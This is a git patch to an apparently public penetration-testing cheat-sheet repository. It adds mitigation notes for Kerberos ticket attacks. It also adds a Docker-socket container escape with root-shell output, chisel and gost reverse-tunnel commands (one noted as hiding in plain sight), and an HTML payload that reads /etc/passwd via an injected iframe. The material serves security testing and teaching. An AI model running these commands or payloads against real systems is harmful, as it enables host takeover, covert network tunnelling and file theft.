From ecf29c2cbe6c61261e67de657cc712f8dc245c4d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 18 Jun 2020 11:55:48 +0200
Subject: [PATCH] Active Directory - Mitigations

---
 .../Active Directory Attack.md                | 17 +++++++-
 .../Container - Docker Pentest.md             | 28 ++++++++++++-
 .../Network Pivoting Techniques.md            | 39 ++++++++++++++++++-
 Server Side Request Forgery/README.md         | 20 ++++++++++
 4 files changed, 100 insertions(+), 4 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 0e206fa..ad4ff3c 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -715,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci
 Converting kirbi => ccache
 ```
 
+
+Mitigations:
+* Hard to detect because they are legit TGT tickets
+* Mimikatz generate a golden ticket with a life-span of 10 years
+
 ### Pass-the-Ticket Silver Tickets
 
 Forging a TGS require machine accound password (key) or NTLM hash from the KDC
@@ -734,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
 root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 
+Mitigations:
+* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
+
 ### Kerberoasting
 
 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
@@ -772,7 +780,7 @@ Then crack the ticket with hashcat or john
 ```
 
 Mitigations: 
-* Have a very long password for your accounts with SPNs (> 25 characters)
+* Have a very long password for your accounts with SPNs (> 32 characters)
 * Make sure no users have SPNs
 
 ### KRB_AS_REP Roasting
@@ -834,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
 root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
 ```
 
+Mitigations: 
+* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
+
 ### Pass-the-Hash
 
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
@@ -1595,6 +1606,7 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 
 ## References
 
+* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
 * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
@@ -1660,4 +1672,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
 * [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
 * [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
-* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
\ No newline at end of file
+* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
+* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
\ No newline at end of file
diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md
index 26ca5d9..55b3cb3 100644
--- a/Methodology and Resources/Container - Docker Pentest.md	
+++ b/Methodology and Resources/Container - Docker Pentest.md	
@@ -33,6 +33,31 @@ curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Conte
 curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
 ```
 
+Exploit using [brompwnie/ed](https://github.com/brompwnie/ed)
+
+```powershell
+root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true        
+[+] Hunt dem Socks
+[+] Hunting Down UNIX Domain Sockets from: /var/run/
+[*] Valid Socket: /var/run/docker.sock
+[+] Attempting to autopwn
+[+] Hunting Docker Socks
+[+] Attempting to Autopwn:  /var/run/docker.sock
+[*] Getting Docker client...
+[*] Successfully got Docker client...
+[+] Attempting to escape to host...
+[+] Attempting in TTY Mode
+chroot /host && clear
+echo 'You are now on the underlying host'
+chroot /host && clear
+echo 'You are now on the underlying host'
+/ # chroot /host && clear
+/ # echo 'You are now on the underlying host'
+You are now on the underlying host
+/ # id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```
+
 
 ## Open Docker API Port
 
@@ -146,4 +171,5 @@ $ docker run --rm cve-2019-5736:malicious_image_POC
 - [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
 - [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
 - [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
-- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
\ No newline at end of file
+- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
+- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/)
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 78958b0..cd4bc9e 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -12,6 +12,8 @@
 * [Metasploit](#metasploit)
 * [sshuttle](#sshuttle)
 * [chisel](#chisel)
+  * [SharpChisel](#sharpchisel)
+* [gost](#gost)
 * [Rpivot](#rpivot)
 * [RevSocks](#revsocks)
 * [plink](#plink)
@@ -170,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:
 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
 ```
 
+### SharpChisel
+
+A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel
+
+```powershell
+user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com"
+================================================================
+server : run the Server Component of chisel 
+-p 8080 : run server on port 8080
+--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
+--auth "user:pass" : Creds required to connect to the server
+--reverse:  Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
+--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.
+
+user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks
+```
+
+## Gost
+
+> Wiki English : https://docs.ginuerzh.xyz/gost/en/
+
+```powershell
+git clone https://github.com/ginuerzh/gost
+cd gost/cmd/gost
+go build
+
+# Socks5 Proxy
+Server side: gost -L=socks5://:1080
+Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
+
+# Local Port Forward
+gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
+```
+
 ## Rpivot
 
 Server (Attacker box)
@@ -305,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
-* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
\ No newline at end of file
+* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
+* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 38318b2..19ba16e 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -33,6 +33,7 @@
 * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
 * [SSRF exploiting Redis](#ssrf-exploiting-redis)
 * [SSRF to XSS](#ssrf-to-xss)
+* [SSRF from XSS](#ssrf-from-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
   * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
@@ -426,6 +427,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple
 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
 ```
 
+## SSRF from XSS
+
+### Using an iframe
+
+The content of the file will be integrated inside the PDF as an image or text.
+
+```html
+<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
+```
+
+### Using an attachment
+
+Example of a PDF attachment using HTML 
+
+1. use `<link rel=attachment href="URL">` as Bio text
+2. use 'Download Data' feature to get PDF
+3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
+4. `cat attachment.bin`
+
 ## SSRF URL for Cloud Instances
 
 ### SSRF URL for AWS Bucket